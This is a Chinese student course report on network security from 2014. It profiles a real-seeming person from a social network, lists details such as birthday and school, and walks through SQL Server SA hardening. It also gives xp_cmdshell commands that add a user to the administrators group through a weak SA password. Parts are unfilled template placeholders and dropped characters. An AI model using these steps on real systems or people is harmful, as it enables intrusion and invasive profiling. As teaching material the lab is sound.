网络安全课程设计报告书

上海应用技术学院课程设计任务书

2014年 7 月1 日 2014年 7 月 1 日

1. 课程设计目的和要求

1.1 目的

本课程设计是计算机科学与技术专业、网络工程专业重要的实践性环节之一，是在学生学习完《密码学与网络安全技术》课程后进行的一次全面的综合练习。通过课程设计，使学生熟练掌握计算机网络安全知识的基本概念和原理，熟悉了解网络安全的基本技术和攻防方法，培养学生将专业理论知识和工程技术应用有机结合的高级应用能力，使学生具备从事网络管理维护和信息安全管理方向的职业的基本素质和技能，提高设计文档的撰写能力。

1.2要求

(1) 分析课程设计题目的要求；

(2) 要求在设计的过程中，完成清晰的功能设计；

(3) 要求系统架构合理，模块划分清晰；

(4) 对于程序设计课题，应编写程序代码，调试程序使其能正确运行；对于操作应用课

题，应有清楚明确的执行步骤和过程；

(5) 设计完成后提交课程设计报告（按学校要求装订）、报告的电子文档和程序源代码

文件。

2、课程设计任务容

设计主要容如下

(1)根据任务要求，选择了T1、T2、T3、T4、T5和T6题目。其中T1要求完成。。。。。；

T2要求完成。。。。。；T3要求完成。。。。。；T4要求完成。。。。。；T5要求完成。。。。。；T6

要求完成。。。。。

(2)最终提供的主操作界面应该为便于操作和使用，文档结构清晰简洁，容完整准确。

(3)最后提交的课程设计成果包括：

a)课程设计报告打印稿；

b)课程设计报告电子稿；

c)源程序文件；

d)可执行文件。

3、详细设计

3.1 敏感信息搜集

(1)课题容：

分析监控安全协议数据，解析IPSec报文格式及容

…………………………………………….(略，详情见电子文档) (2)具体实现或操作流程

在人人网上搜洛洛，男，上海，年龄16~22岁，天蝎座

第一个名字相符合

查看相册

点击头像

可能具有利用价值的信息照片

洛洛

性别男

家乡市

手机

生日1989.6.8

血型

生肖

星座双子座

省份

城市

大学名称理工大学

大学入学年份 2007

大学院系材料学院

大学班级

中学名称二中

中学班级

中学毕业年份2004

照片

手机

生日

血型

生肖

星座

省份

城市

大学名称

大学入学年份

大学院系

大学班级

中学名称

中学班级

中学毕业年份

3.2 DES加解密编程

3.2.1 DES加密解密程序

对DESEncrypto.java 进行编译，如图所示：

编译完成后生成DESEncrypto.class文件

新建1hhj.txt文件，该文件容为明文

运行程序，对1hhj.txt进行加密，第一个参数表示要加密的文件，第二个参数表示加密后的文件，第三个参数表示的是加密还是解密（true 表示加密，false表示解密）

程序编译后生成2hhj.txt文件

加密后的文件为 2hhj.txt，如下图：

对 2hhj.txt 进行解密，第一个参数表示要解密的文件，第二个参数表示解密后的文件，第三个参数表示的是加密还是解密（true 表示加密，false 表示解密）：

解密后的文件为 3hhj.txt，如下图：

解密后的文件为 3hhj.txt，如下图：

3.2.2 凯撒密码

程序首界面

加密

解密

3.2.3 RSA算法首界面

产生公钥和私钥

加密

解密

3.3 SQL Server安全设置

首先单击“开始”|“程序”|“Microsoft SQL Server”|“查询分析器”，输入密码“sa”, 如图所示:

然后点击“确定”按钮，在“查询分析器”窗口使用并执行下面的 SQL 语句：Use master Select name,Password from syslogins where password is null

设置 SA 用户的密码，请按下列步骤操作：单击“开始”|“程序”|“Microsoft SQL Server”|“企业管理器”，展开服务器组，然后展开服务器。如图：

在细节窗格中，右键点击 SA，然后点击属性，点击登陆

在密码方框中，输入新的密码。

查看数据库日志

管理 SQL Server 置存储过程 xp_cmdshell 控制系统

打开 sql 查询分析器，输入要访问的数据库地址（如：

192.168.xx.xxx），然后点击确定。如下图：

利用 SA 弱口令登陆 SQL Server 服务。

在新的窗口中输入：xp_cmdshell "dir c:"；并按 F5 执行查询。查看返回结果，如下图：

试图建立新用户

输入xp_cmdshell "net user mytesthhj123456 /add" 后将添加一个 mytest用户，密码为123456，类似效果如下图：

然后，可以输入：xp_cmdshell "net user mytesthhj"查看用户列表，效果如下图

输入xp_cmdshell "net localgroup administrators mytesthhj/add"，然后按 F5执行查询